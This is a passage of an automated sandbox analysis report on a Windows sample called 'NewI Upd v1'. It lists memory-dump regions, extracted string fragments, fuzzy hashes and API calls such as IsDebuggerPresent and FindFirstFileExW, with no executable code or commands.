                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ;8$C$C:$F ]&$G(U.$p$vw$bc`$jh
                                                                                  • API String ID: 0-1888752554
                                                                                  • Opcode ID: d6d3efda358e52c6362aa59ae341c7ebf9068fd22dfe1f0b6f717cb43f3b2044
                                                                                  • Instruction ID: f13e8170dc4191d1302c5aae8fd647cb5b51dc7f906add8da76f4da51d8aae7d
                                                                                  • Opcode Fuzzy Hash: d6d3efda358e52c6362aa59ae341c7ebf9068fd22dfe1f0b6f717cb43f3b2044
                                                                                  • Instruction Fuzzy Hash: A71236B2A5C3108BC718DF69DC8129BBBE2EFD5314F09C92DE4D587351E6788909C78A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: GAuG$d`ba$g~$il\l$k!9k$n`ly$y&t$|zp?
                                                                                  • API String ID: 0-1351409680
                                                                                  • Opcode ID: 873c18baae070f6524d35b57998012487a997f700e2d69e4940c44571185dbcf
                                                                                  • Instruction ID: 7a2fd4c55e8b00e8239b77c4b3f3a49de829b56b670d0dc54cdb87692afb1f0c
                                                                                  • Opcode Fuzzy Hash: 873c18baae070f6524d35b57998012487a997f700e2d69e4940c44571185dbcf
                                                                                  • Instruction Fuzzy Hash: 4081066150C3928BC315CB3984A076BFFD19FD6205F198A7EE4D69B3C6E2388D0AC756
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: fo`a$g,!>$wvut$wvut$y,!>$X^$\]"
                                                                                  • API String ID: 0-2684938175
                                                                                  • Opcode ID: 9f49a31440bceca8724b722404acfce0b5a6123fd83804fd7ea6a26eadba025a
                                                                                  • Instruction ID: 3fc7cad3b5ba877a26a3272c6b5ae996e6d938a73bd9e3eeec04a34aa2b07640
                                                                                  • Opcode Fuzzy Hash: 9f49a31440bceca8724b722404acfce0b5a6123fd83804fd7ea6a26eadba025a
                                                                                  • Instruction Fuzzy Hash: 3E1216366087218BC724DF24D8802BFB3E2FF99700F96892DE9C597350E7789A01DB46
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: "$.$H$R$h$p$y
                                                                                  • API String ID: 0-1877895494
                                                                                  • Opcode ID: 64d779b0871a9e8e3ebf2b91ed8ce96c555fa9a28df7dbaf70c6a9258d014142
                                                                                  • Instruction ID: 814d4cc2dc964bff8d85b4ad8c6d0cde489e35eb526fb56bc36b419b437a5494
                                                                                  • Opcode Fuzzy Hash: 64d779b0871a9e8e3ebf2b91ed8ce96c555fa9a28df7dbaf70c6a9258d014142
                                                                                  • Instruction Fuzzy Hash: 5222E372A0C7808BC324DF38C5953AFBBE1ABC9314F194A2EE5D997391D67888458B47
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: !$%R.P$690213190D2228369D923F913F8AA6F7$<^-\$=):<$Wd_h$o\YZ
                                                                                  • API String ID: 0-128471998
                                                                                  • Opcode ID: a8a60f1c94ef2cb0f82f3ebe1d3bbb7747837e10c975e72afa211e211b85bc91
                                                                                  • Instruction ID: ea466127d3427ea8260b03010496f31bf6f3bb086989d147bd569282d8e95738
                                                                                  • Opcode Fuzzy Hash: a8a60f1c94ef2cb0f82f3ebe1d3bbb7747837e10c975e72afa211e211b85bc91
                                                                                  • Instruction Fuzzy Hash: F5D155716483408BD314DF75C8916ABBBE2EBC1304F08493DE4D59B392D778D90ACB96
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: 01$X-d$r-d$wvut$wvut$wvut
                                                                                  • API String ID: 2994545307-832908049
                                                                                  • Opcode ID: 48252b346197013ab87d6c2eea2e04574c02d7b0adccc7b8b212ce9ec982b9fc
                                                                                  • Instruction ID: 058fb72e89f1b760c447db5e870baf2167253f75a0d269a07b6e1ee1b62b50d5
                                                                                  • Opcode Fuzzy Hash: 48252b346197013ab87d6c2eea2e04574c02d7b0adccc7b8b212ce9ec982b9fc
                                                                                  • Instruction Fuzzy Hash: 6082063460A3406FD7118F24D8817ABBBE2EBD6714F28882EE4C547392D679DC95CB4B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: FBDr$UU~/$[X$nol$x~$|r
                                                                                  • API String ID: 0-2561386150
                                                                                  • Opcode ID: e540fb6e670f536f0ba995a4d10c67065d39990fca980b977c0ace72e65ef309
                                                                                  • Instruction ID: 6f34dedc997c3ba296ef7fd38ef9b93767032c9962313fb9ab88f0cd06fb20b9
                                                                                  • Opcode Fuzzy Hash: e540fb6e670f536f0ba995a4d10c67065d39990fca980b977c0ace72e65ef309
                                                                                  • Instruction Fuzzy Hash: F72255B5E04225CFCB24DF69E8413AFBBB1EF46304F19846DD486AB341D7389906CB99
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: [X$wvut$[U$_Y$x~$|r
                                                                                  • API String ID: 0-1702839061
                                                                                  • Opcode ID: bab7f4f8407b1c6ab052c34850c08ebca3260780f6b47d6b3057e3a4f89dc308
                                                                                  • Instruction ID: abafa73712f680908ded728f56e723c7fd967ba4ce1dbf73b572470a5cd9e859
                                                                                  • Opcode Fuzzy Hash: bab7f4f8407b1c6ab052c34850c08ebca3260780f6b47d6b3057e3a4f89dc308
                                                                                  • Instruction Fuzzy Hash: 2B122AB6A083548BD7249F29DC4176BB7E2EFD5314F09892DD8999B382DB349801CB86
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $%$EyAB$LK^U$fI$jhn}$}Ayz
                                                                                  • API String ID: 0-2370480214
                                                                                  • Opcode ID: 250d52b7a2d9a4048c4baa1f888b06f5f24d713bfc3508c1bddfe1a7033dff46
                                                                                  • Instruction ID: 018c1efd376704d7594dfbe1329c173c14b603551474b852f2f97e26f70e4076
                                                                                  • Opcode Fuzzy Hash: 250d52b7a2d9a4048c4baa1f888b06f5f24d713bfc3508c1bddfe1a7033dff46
                                                                                  • Instruction Fuzzy Hash: 75712575A183809FD7309F2598563ABB3A6EF83314F19093DD4C94B362EB384985C75B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: %$>=+t$Huj$seX8$:
                                                                                  • API String ID: 0-2326394301
                                                                                  • Opcode ID: 48ed91b5457a2a53132ad7e25a74be88aaf1906de303ccb1b3a74365b477332e
                                                                                  • Instruction ID: 3f317c4887befe1693a6a56990b30d24a0141a477cd067198286a00fc510e86a
                                                                                  • Opcode Fuzzy Hash: 48ed91b5457a2a53132ad7e25a74be88aaf1906de303ccb1b3a74365b477332e
                                                                                  • Instruction Fuzzy Hash: 51C25572A01259CFCB04CFA9E9905EDBBF1FF58311F14826AE949E7291E3389A45CF50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: *$7$gfff$wvut$wvut
                                                                                  • API String ID: 0-1115614266
                                                                                  • Opcode ID: 5acc399c9ae1919999839faf72870f617a4e1c369a62d689b89be54e0f9fcebc
                                                                                  • Instruction ID: 19d800e31c10d0aaa58fc661620c393ea5f5fb0188774170dc17f33fc21253bc
                                                                                  • Opcode Fuzzy Hash: 5acc399c9ae1919999839faf72870f617a4e1c369a62d689b89be54e0f9fcebc
                                                                                  • Instruction Fuzzy Hash: 87E13A726087418BC718CF28D8517ABB7E2EBC5314F198A7DE48ADB391DB38D905CB46
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: V&a)$Z&a)$wvut$L4$L4
                                                                                  • API String ID: 2994545307-2692662489
                                                                                  • Opcode ID: 3f81ded276506ee1919fdcb18e38c98a24cc538433152c03b0ebcaab23a4e166
                                                                                  • Instruction ID: 3a3d7920e5f28119da16de7cf853ee49e5b64c1050b927159352e8d60b2d9c6e
                                                                                  • Opcode Fuzzy Hash: 3f81ded276506ee1919fdcb18e38c98a24cc538433152c03b0ebcaab23a4e166
                                                                                  • Instruction Fuzzy Hash: 68D17C756083419FD714CF25D8A17AFB3D2BBD6318F14893DE49987291CB389C86CB4A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 0$Q$_$p$v
                                                                                  • API String ID: 0-636952703
                                                                                  • Opcode ID: 0d3a3da1710a9b5b0d1e6dd9d27aa401f7c30f61325736059ea3f67ee05a21f0
                                                                                  • Instruction ID: 0af557c47fccd54a1610aec0536577f4b9044c2212ef548513126a11b74d849e
                                                                                  • Opcode Fuzzy Hash: 0d3a3da1710a9b5b0d1e6dd9d27aa401f7c30f61325736059ea3f67ee05a21f0
                                                                                  • Instruction Fuzzy Hash: 3F71AF2210C7C18AD7518A3C489429BEFD24BE7234F2D9B9DE4F5873D2C52AC50A9767
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: !!$!9$8<$<0$lm
                                                                                  • API String ID: 0-329392658
                                                                                  • Opcode ID: 7f0a8532f8baf5ac406c8a6587795f082fb309e973dda90e0c9024e64d50f2d9
                                                                                  • Instruction ID: 75fa5aab44c1138973aa2edcd39388b7051be89b7ccf94615bbf86e1c3d6e53a
                                                                                  • Opcode Fuzzy Hash: 7f0a8532f8baf5ac406c8a6587795f082fb309e973dda90e0c9024e64d50f2d9
                                                                                  • Instruction Fuzzy Hash: F66142B55093808BD7748F25E8923EBBBE2EBC6314F548E2DD5CD4B244DB384582CB96
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0087D95B
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0087DA2B
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0087DA57
                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0087DA61
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                  • String ID:
                                                                                  • API String ID: 254469556-0
                                                                                  • Opcode ID: 8a4f928dcdfbe0f63fdb419003b7f14d0cbcf9b1b717c462a31b5e858ff691c9
                                                                                  • Instruction ID: 94e9375dff1c99f0ca191eb609bd6e8375be320b08ebd9affc4b474f1367971b
                                                                                  • Opcode Fuzzy Hash: 8a4f928dcdfbe0f63fdb419003b7f14d0cbcf9b1b717c462a31b5e858ff691c9
                                                                                  • Instruction Fuzzy Hash: E63117B8C043289AEB21DFA4D8497DDBBB4FF59304F0081E9E90CAA255E7718B85CF51
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,0087D150,008AF190), ref: 0087D025
                                                                                  • UnhandledExceptionFilter.KERNEL32(0087D150,?,0087D150,008AF190), ref: 0087D02F
                                                                                  • GetCurrentProcess.KERNEL32(C0000409,?,0087D150,008AF190), ref: 0087D03A
                                                                                  • TerminateProcess.KERNEL32(00000000,?,0087D150,008AF190), ref: 0087D041
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 3231755760-0
                                                                                  • Opcode ID: 13cc048287e515ba6a11083f92c25d98841856f501e70ee6f702015ec3794283
                                                                                  • Instruction ID: 5f4bec9a8e89bed50ad3fbf76f813100237e56675364095fb8db964028134d18
                                                                                  • Opcode Fuzzy Hash: 13cc048287e515ba6a11083f92c25d98841856f501e70ee6f702015ec3794283
                                                                                  • Instruction Fuzzy Hash: 18D0C975400604EBE7102BE0FC0CA493B6CBB0A212F004420F709C2923DB3094409B79
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: P]QS$SASt$UMQU$gD
                                                                                  • API String ID: 0-3700796039
                                                                                  • Opcode ID: 3d6bbfbc5dcbb23a6ba540e773455c35fb51c230d6fcbebb5aa0a1b1154130ef
                                                                                  • Instruction ID: 9078fd659d4e0eb8636bc0c374281540add951d8ccb964d43f516dd22269708b
                                                                                  • Opcode Fuzzy Hash: 3d6bbfbc5dcbb23a6ba540e773455c35fb51c230d6fcbebb5aa0a1b1154130ef
                                                                                  • Instruction Fuzzy Hash: 0C413C7150C3D28BD73A8F3594903EBBBE2AFD2304F98496DC0CE87241DB7948068B96
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: D]+\$g%&$g%&
                                                                                  • API String ID: 0-2338581241
                                                                                  • Opcode ID: 6856f4cabd4c67a98aceea986a7f3fbb80d58b34a128a02fdb570e4b7fd13515
                                                                                  • Instruction ID: b521f69c2c6c4258ec1e4259d2c28972bdec312ee4aee09ee2eb01e097c526d3
                                                                                  • Opcode Fuzzy Hash: 6856f4cabd4c67a98aceea986a7f3fbb80d58b34a128a02fdb570e4b7fd13515
                                                                                  • Instruction Fuzzy Hash: AB523274608300DBD7049F28E852BBBB3A1FBC6314F24493DE481973A1E779AD55CB8A
                                                                                  APIs
                                                                                  • FindFirstFileExW.KERNEL32(00000000,?,4903A6BA), ref: 0089647B
                                                                                  • std::_Timevec::_Timevec.LIBCPMTD ref: 00896488
                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0089661D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$FirstNextTimevecTimevec::_std::_
                                                                                  • String ID:
                                                                                  • API String ID: 2141543823-0
                                                                                  • Opcode ID: 9b5bf1a0db2c67db805d4d7b38b0cc6d93aa3c43ac5de9bf404b21dae31d74ea
                                                                                  • Instruction ID: 1982d0124366fe6246d5fb46b0afb303f48899b65adbac9ea9488e2651de5f2b
                                                                                  • Opcode Fuzzy Hash: 9b5bf1a0db2c67db805d4d7b38b0cc6d93aa3c43ac5de9bf404b21dae31d74ea
                                                                                  • Instruction Fuzzy Hash: 31A15C719141299BDF64EF24CC99BAEB375FF54300F0842E9E40AA7291EB30AE95CF50
                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00888FB0
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00888FBE
                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00888FCB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                  • String ID:
                                                                                  • API String ID: 3906539128-0
                                                                                  • Opcode ID: 7622b709d96422fa06849f03eb6dc34f419608ea967592db0e96de7a850c3ab2
                                                                                  • Instruction ID: 2bdf58f284241c387b4fa8e34473aaeba2b6cc00d654e69e6d1d9e6a18f1ac92
